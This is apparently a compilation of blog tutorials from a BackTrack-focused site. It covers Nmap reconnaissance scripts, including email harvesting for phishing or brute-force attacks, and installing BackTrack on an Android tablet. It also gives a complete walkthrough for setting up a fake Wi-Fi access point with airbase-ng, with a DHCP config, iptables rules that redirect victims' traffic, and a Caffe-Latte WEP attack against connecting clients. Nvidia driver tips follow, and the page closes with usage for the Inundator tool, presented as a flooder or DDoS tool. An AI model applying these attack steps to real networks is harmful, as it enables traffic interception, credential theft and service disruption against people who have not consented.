Nmap all scripts

Nmap is tool that can perform various activities in a penetration test.The function of NSE (Nmap Scripting Engine) and the scripts that have written so far they can transform Nmap to a multi purpose tool.For example we can use Nmap during the information gathering stage of a penetration test just by using the appropriate scripts.In this article we will examine those scripts and the information that we can extract.
One of our first steps it can be to determine the origin of the IP address that our client has given to us.Nmap includes in his database a couple of scripts for this purpose.If we want to run all these scripts we can use the following command as it can be seen in the image below:

Nmap – IP Geolocation

As we can see the script called an external website (geobytes) in order to determine the coordinates and location of our target.

Whois

The command Whois can be run directly through the console in Linux environments.However there is a specific script for Nmap that performs the same job and it can be used.This script will return information about the registrar and contact names.

Nmap – Whois

Email Accounts

Email accounts can prove also important in a penetration test as it can be used as usernames,in social engineering engagements (i.e Phishing Attacks)or in a situation where we have to conduct brute force attacks against the mail server of the company.There are two scripts available for this job:

• http-google-email
• http-email-harvest

The http-google-email script uses the Google Web and Google Groups in order to search for emails about the target host while the http-email-harvest spiders the web server and extracts any email addresses that it discovers.The http-email-harvest is in the official repository of Nmap and the http-google-email script can be downloaded from here.

Nmap – Discover Email Accounts

Brute Force DNS Records

DNS records contains a lot of information about a particular domain which cannot be ignored.Of course there are specific tools for brute forcing DNS records which can produce better results but the dns-brute script can perform also this job in case that we want to extract DNS information during our Nmap scans.

Nmap – Brute Forcing DNS

Discovering Additional Hostnames

We can discover additional hostnames that are based on the same IP address with the nmap script http-reverse-ip.This script can help us to find other web applications that exist on the same web server.It is an external script that can be downloaded from here.

Nmap – Reverse IP

Conclusion
In this article we examined some Nmap scripts (internal and external) that can be used during the information gathering stage of a penetration test and before we start the actual scanning.The information that we have obtained proves that Nmap can perform almost any task with his scripts.If it cannot do something that you want then it is time to write your own Lua scripts and to contribute to the community.
Root-Dev on Facebook
Root-Dev Website

Install BackTrack on Android Tablet [[FULL Tut0]]

Now prepare the tools and device to install Backtrack on Android tablet.

1. Backtrack 5 ARM.
Download Backtrack 5 ARM from Backtrack official site. Backtrack with ARM architecture only on Backtrack 5 version. ARM architecture not available for Backtrack 5 R1, Backtrack 5 R2, and Backtrack 5 R3.

2. Rooted Galaxy Tab 10.1
Why rooted Galaxy Tab? Because we need install some application that need Android to be root :-)

3. Busybox, Superuser, Terminal Emulator, and AndroidVNC.
You can download search and all of them on Google Play. BusyBox is installer and uninstaller Android program, Superuser is superuser rights manager for Android, Terminal Emulator is Android's built-in Linux command line shell program, and AndroidVNC is a VNC viewer for Android.

How to Install Backtrack on Android Tablet?

1. Extract BT5-GNOME-ARM.7z to folder, for example "BT5" folder and then put on Galaxy Tab root directory.

2. Open Terminal Emulator on Galaxy Tab then go to BT5 folder with command prompt. Here the command
cd sdcard/BT5



3. Then run this following command and you will se root@localhost :-)
su
sh bootbt



4. Now lets run Backtrack GUI with VNC viewer
startvnc

5. To connect wth VNC we must know the port where VNC listening. Run netstat -anpt and remember the port where VNC listening. In this case the port is 5901

6. Open AndroidVNC and fill the form like this:
Nickname : BT5
Password : toortoor
Address : 127.0.0.1
Port : 5901

7. Connect it and you will see Backtrack 5 interface :-)

Remember! Some of the Backtrack tools can't work properly and do it for your own risk. I hope you can Install Backtrack on Android tablet without any problems, tell me if you get problems.

Fake AP Airbase-ng

This tutorial i will show you how to set up a simple fake AP with airbase-ng This can be used for multiple reasons like attacking non associated victims forcing them to automatic connect to ur AP thinking it is their own legit AP the first thing we will need to do is set up airbase-ng

Code:

airbase-ng -e BTHomeHub2 -c 1 wlan0

Options:
-e Essid For AP
-c Channel Number
wlan0 Wireless Interface
This will then create a tap device like below

Code:

root@bt:~# airbase-ng -e BTHomeHub2 -c 1 wlan0 
08:15:24  Created tap interface at0
08:15:24  Trying to set MTU on at0 to 1500
08:15:24  Trying to set MTU on wlan0 to 1800
08:15:24  Access Point with BSSID 00:C0:CA:47:32:24 started.

airbase-ng Options
-e Essid
-c Channel Number
wlan0 wireless interface
Now that we have the ap running we need to make it so the clients can obtain a ip address so lets set up are ip tables

Code:

ifconfig at0 up 
ifconfig at0 192.168.1.254 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.254

Now that we have are ip tables set for the client we need to configure are dhcp3 server a little
here is my dhcp.conf

Code:

ddns-update-style ad-hoc; 
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255;
option routers 192.168.1.254;
option domain-name-servers home;
range 192.168.1.1 192.168.1.140;
}

just simply add this to the bottom of ur /etc/dhcp3/dhcp.conf
Once that has been entered & saved dhcp server can be started

Code:

/etc/init.d/dhcp3-server start

Now all we have left to do is to configure the routing table for the AP

Code:

iptables –flush 
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
iptables –table nat –append POSTROUTING –out-interface wlan0 -j MASQUERADE
iptables –append FORWARD –in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.1.254
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
echo 1 > /proc/sys/net/ipv4/ip_forward

Now you should have a fully functional Fake ap if you would like to have this fake ap run the caffe-latte attack just add to the airbase-ng -L -W 1 -x 150 for example

Code:

airbase-ng -L -W 1 -x 150 -e BTHomeHub2 -c 1 wlan0

My Output

Code:

root@bt:~# airbase-ng -L -W 1 -x 150 -e BTHomeHub2 -c 1 wlan0 
08:33:13  Created tap interface at0
08:33:13  Trying to set MTU on at0 to 1500
08:33:13  Access Point with BSSID 00:C0:CA:47:32:24 started.
08:33:22  Client 00:1F:1F:14:4D:6B associated (WEP) to ESSID: “BTHomeHub2″
08:33:32  Client 00:1F:1F:14:4D:6B associated (WEP) to ESSID: “BTHomeHub2″
08:33:32  Starting Caffe-Latte attack against 00:1F:1F:14:4D:6B at 150 pps.

airbase-ng Options
-L caffe-latte attack
-L WEP encrytion on
-x Number of packets to send
-e Essid
-c channel Number
wlan0 wireless interface
The only problem is that I haven’t managed to get the caffe-latte attack fully working due to the fact that the only time it captures Iv correctly is when the client reconnects to the ap so the only way ivs had caffe-latte working kind of well is to DE authenticate the client every 10 seconds.
Visit Root Developpers
And Facebook Page : https://www.facebook.com/root.develop

How to add menu backtrack on ubuntu.

Download menu from : sourceforge.

wHydah Linux Distrubution!

Welcome back my Team : AirTeam , have creat new wHydah Linux Distriubution !
BackTrack WHYDAH Official Forum/Website : http://www.whydah.airteam.org/
Download the new version : http://sourceforge.net/projects/airteam/
Facebook FanPage : https://www.facebook.com/airteam.org
Team AirTeam : Sam Bellamy , Bond Benz , MasterButcher68.
HaveFun.

How to install Nvidia Drivers.

Hi for those who are having trouble installing nvidia, " DO NOT MESS WITH THE KERNEL OR MODIFY ANYTHING"!
This is the correct way to go:

1) download synaptic : apt-get install synaptic.
2) make sure Software sources is available under ADMINISTRATION.

DO NOT ACTIVATE ANY UPDATE FROM SOFTWARE SOURCES.

3) Here is the best solution for you ( tested and running on HP G70, Gforce 9200M , Backtrack 5 Gnome 32bit).

Open terminal and paste: add-apt-repository ppa:ubuntu-x-swat/x-updates
*** The system will ask you to if you want to install " add " say Y.
Make sure the ppa is installed, re-paste the above command if necessary.

Again in the terminal : apt-get update && apt-get install nvidia-current nvidia-current-modaliases nvidia-settings

*** Reboot

Again in the terminal paste : nvidia-xconfig

*** Reboot again and you're good to go.

Hope this helps.
GD

Ps: you might want to fix the grub, do it this way; nano /etc/default/grub
Scroll down to : #GRUB_GFXMODE=640×480
Uncomment # ( take # off the script. like this : GRUB_GFXMODE=640×480)
Set you screen resolution according to your screen, mine is 1440x900 !
Now hit : CTRL+o to overwrite >>Enter, CTRL + x to save and exit.
Now in terminal : update-grub

Good luck.

Tool Inundator Flooder / Ddoser

Name : Tool Inundator (BackTrack 5 R3)
Description : IDS/IPS/WAF Evasion & Flooding


cd /pentest/stressing/inundator

ls

Usage : 
./inundator.pl --verbose --threads 10 <IP>

if you don't have backtrack r3 download from :
http://sourceforge.net/projects/inundator/

Don't forget to visit our page on facebook : BackTrack - Linux
and Root Developper  Website : www.root-dev.zzl.org